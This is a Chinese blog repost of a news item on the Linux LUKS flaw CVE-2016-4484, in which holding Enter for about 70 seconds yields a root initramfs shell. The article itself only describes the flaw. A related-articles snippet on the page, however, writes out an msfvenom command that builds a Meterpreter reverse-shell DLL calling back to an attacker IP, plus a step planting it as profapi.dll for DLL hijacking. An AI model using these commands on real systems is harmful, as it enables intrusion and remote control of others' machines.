Linux曝新漏洞 按住Enter键70秒可触发

最新推荐文章于 2024-08-15 16:25:25 发布
最新推荐文章于 2024-08-15 16:25:25 发布
阅读量129 收藏
点赞数
文章标签: shell 操作系统
原文链接:https://yq.aliyun.com/articles/144450
版权

目前,Linux系统再次曝出新漏洞,漏洞代码CVE-2016-4484,攻击者只需长按Enter键70秒,便能获得initramfs shell的root权限,从而让攻击者拥有破解该Linux设备的可能。

据悉,由于Linux中的常用变量Linux统一密钥设置(Linux Unified Key Setup,LUKS)中存在一个漏洞,攻击者通过访问shell,就可以解密运行Linux的设备。同时,该攻击对于云端的虚拟Linux boxen套件同样有效。而且,Debian、Ubuntu、Fedora等操作系统也被确认会受该漏洞的影响。

当攻击者不断尝试暴力破解后,LUKS可能出于调试目的,提供shell的root权限。

该漏洞由苏格兰西部大学讲师Hector Marco和瓦伦西亚理工大学助理教授Ismael Ripoll共同发现。两人指出,由于这个漏洞不需要特定的系统配置即可触发,因此危害性较大。

此外,他们表示,利用该漏洞,攻击者可以复制、修改或销毁硬盘,甚至可以设置一个网络来泄漏数据。

据介绍,该漏洞对于银行(自动提款机)、机场、实验室、图书馆等环境里搭载上述相关操作系统的电子设备危害最大。所幸的是,研究者表示该漏洞能够通过补丁进行修复,并且已经为其开发了一个防止被黑的应急方案。

不过,由于该漏洞波及面较广,研究者表示在Linux等系统未全面更新前,该漏洞仍将存在被利用的可能。

本文转自d1net(转载)

D_SJ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows常用快捷和Windows CMD命令大全
小北的博客
11-01 6017
Windows常用快捷 1、win快捷: 单独按Windows:显示或隐藏 “开始”功能表 Windows+BREAK:显示“系统属性” 对话框 Windows+D:显示桌面或恢复桌面 Windows+M:最小化所有窗口 Windows+Shift+M:还原最小化的窗口 Ctrl+Shift+N:新建文件夹 Windows+E:打开"我的电脑" Windows+I:打开“设置” Windows+K:打开“连接”快速操作 Windows+F:查找文件或文件夹 Windows+S:打开"搜索" Window
JavaScript实现按Ctrl打开新页面
10-25
JavaScript实现按Ctrl打开新页面的知识点主要包括: 1. HTML5中A标签的使用:HTML5规范允许在A标签内包含多个DIV或其他块级元素。这样,原本需要使用JavaScript监听点击事件并调用window.location来实现的页面...
Linux曝高危漏洞Enter70获得root权限
weixin_34274029的博客
11-23 149
2019独角兽企业重金招聘Python工程师标准>>> ...
Linux高危漏洞:按Enter70获得root权限
Mr.ROBOT
11-30 558
E安全11月16 日讯 Linux 被发现高危漏洞(CVE-2016-4484),攻击者可以通过持续按下 Enter 70 钟来获取 root initramfs shell,进而破坏 Linux boxes。漏洞存在于 Linux 流行变体中的统一密钥设置(LUKS)。通过访问 shell,攻击者可以解密 Linux 机器。该攻击也适用于云端的虚拟 Linux boxes。
Linux root 密码 70,Linux神奇漏洞:长按回车70 即可轻松拿到Root权限
weixin_32123259的博客
05-07 219
一般来说获取系统Root权限是很困难的,尤其是加密系统中,但西班牙安全研究员Hector Marco、Ismael Ripoll发现,Linux系统下只需按住回车70钟,就能轻松绕过系统认证,拿到Root权限,进而远程控制经过加密的Linux系统。这个问题来自Linux标准磁盘加密程序Cryptsetup的一个漏洞(CVE-2016-4484),它处理密码输入错误的时候,会允许用户多次重试输入...
翻译:Panda3D Manual/V. Programming with Panda/U. Hardware support
python二级题库
04-15 1332
硬件支持(Hardware support)本章介绍Panda3D对盘和鼠标的支持,以及引入joystick的方法。  盘支持(Keyboard Support)Panda3D内置对盘的支持。按下盘发送事件。当第一次被按下时,每个发送一个事件,松开后再按下时,将再次发送事件。以下的代码接受盘事件:self.accept( , ) self.accept(
OpenHarmony-标准设备系统代码操作梳理
热门推荐
@_南先生的博客
12-16 7万+
本文主要介绍windows环境下RK3568开发板全流程操作梳理,供参考,含代码下载、版本编译、烧写、测试套编译、执行等操作梳理(注:除过烧写和用例执行,其他代码下载编译等都是在Ubuntu环境下操作,建议个人用户家目录下存放个人数据:工具安装、代码下载等),代码上库和hdc的相关命令操作等参考本人另一篇OpenHarmony-代码操作总结相关部分。 OpenHarmony开发资料归档 目录 一、板子组装 二、WSL2安装 三、获取源码 注册码云gitee账号 注册码云SSH公钥 安装g..
Armitage
子曰小玖的博客
04-22 5742
一,目录 关于Armitage在我们开始之前... 入门如何让任何女人与您交谈 用户界面之旅这么多漂亮的屏幕截图 主机管理您必须找到它们来破解它们。 剥削这是有趣的东西 剥削后,这是非常有趣的东西 机动性遍及网络并达到更多目标 团队Metasploit这是网络攻击管理! 脚本约束下一步... 1.关于阿米蒂奇 1.1什么是阿米蒂奇? Armitage是用于Metasplo...
嵌入式Linux驱动,支持短按和长按检测
03-15
在嵌入式Linux系统中,按驱动是与用户交互的重要组成部分。本文将深入探讨如何实现一个支持短按和长按检测的按驱动,利用平台驱动框架、按中断、内核定时器以及POLL机制,确保在休眠-唤醒场景下也能高效工作,...
获取数字、字母、退出Enter和Ctrl组合等的ASCII码
04-27
在文本编辑中,按下Enter会插入一个换行符,结束当前行并开始新的行。在编程中,它常用于提交输入或执行命令。 Ctrl组合不直接对应一个ASCII码,因为它不单独生成一个字符。然而,当Ctrl与其他组合使用时,...
python按按住不放持续响应的实例代码
09-19
需要注意的是,`pygame.key.set_repeat()`函数可以实现按重复的效果,即在按按住一段时间后自动重复触发`KEYDOWN`事件,但在这里,作者选择了一个自定义的方法,通过跟踪按状态来实现持续响应,这种方式更易于...
jQuery事件之盘事件(ctrl+Enter回车提交表单等)
10-25
值得注意的是,如果用户持续按住,`keydown`事件会反复触发,除非阻止了默认行为。 ```javascript $('input').keydown(function(event) { alert(event.keyCode); }); ``` 2. `keypress`事件:与`keydown`相似,...
MongoDB | MongoDB 终端查询
weixin_44435110的博客
08-12 814
MongoDB 是一个高性能、易扩展的文档型 NoSQL 数据库。本文档将指导你如何使用 MongoDB 的命令行工具`mongo` shell来查询存储在MongoDB数据库中的数据。
Shell编程
欢迎阅读我的博客
08-15 756
shell编程
linux定时自启动shell脚本
打不倒的程序猿
08-15 192
如果在编写脚本时遇到 -bash: ./test.sh: /bin/bash^M: 解释器错误: 没有那个文件或目录 则执行 >sed -i 's/\r$//' xxxx.sh 因为在windows下,用记事本编写脚本文件,会导致编译出错。windows下的换行符为\n\r,linux下的换行符为\n,所以需要对\r进行格式转换
shell编程中的管道符 ‘|‘
最新发布
2301_77836489的博客
08-15 460
shell编程中的管道符 '|'
【busybox记录】【shell指令】chroot
44083579的博客
08-14 242
chroot指令用法
Windows第三方软件提权-QQpinyin
A19911511842的博客
08-15 227
使用kali的msfvenom制作反弹shell的dll木马(kali IP:192.168.188.177):msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.188.177 LPORT=6060 -f dll > shell.dll。在QQ拼音安装目录执行:copy C:\\AppServ\\www\\shell.dll profapi.dll。上传到靶机服务器(文件位置:C:\AppServ\www\shell.dll)
Linux系统按住win
06-07
按住 Super ,通常会触发一些系统级别的快捷。例如: - Super:打开应用程序启动器(类似于 Windows 的开始菜单)。 - Super+D:最小化或还原当前窗口。 - Super+E:打开文件管理器。 - Super+L:锁定屏幕。 - ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值